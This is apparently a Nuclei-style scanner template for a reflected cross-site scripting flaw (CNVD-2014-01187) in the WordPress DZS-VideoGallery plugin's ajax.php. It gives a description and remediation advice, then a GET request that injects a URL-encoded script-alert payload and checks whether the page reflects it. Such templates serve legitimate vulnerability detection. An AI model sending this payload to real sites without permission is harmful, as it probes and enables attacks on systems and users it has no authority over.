id: CNVD-2014-01187
info:
  name: WordPress_DZS-VideoGallery_-ajax.php_XSS_vulnerability_POC
  author:
  - l0ne1y
  description: |-
    WordPress Plugin DZS-VideoGallery 'ajax.php' cross-site scripting vulnerability
    WordPress is a content management system developed using PHP language. DZS-VideoGallery is one of the DZS video gallery plug-ins.

    The WordPress plugin DZS-VideoGallery 'ajax.php' has a cross-site scripting vulnerability. Because the program fails to properly sanitize user-submitted input, an attacker could exploit the vulnerability to execute arbitrary script code in a trusted user's browser in the context of an affected site, steal cookie-based authentication credentials, and launch other attacks.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patch or the latest version of the program: http://digitalzoomstudio.net/docs/wpvideogallery/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: dsl
    dsl:
    - ' contains(body,"<script>alert(\"bb2\")</script>") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/ajax.php?ajax=true&height=400&width=610&type=vimeo&source=%22%2F%3E%3Cscript%3Ealert%28bb2%29%3C%2Fscript%3E'
  method: GET
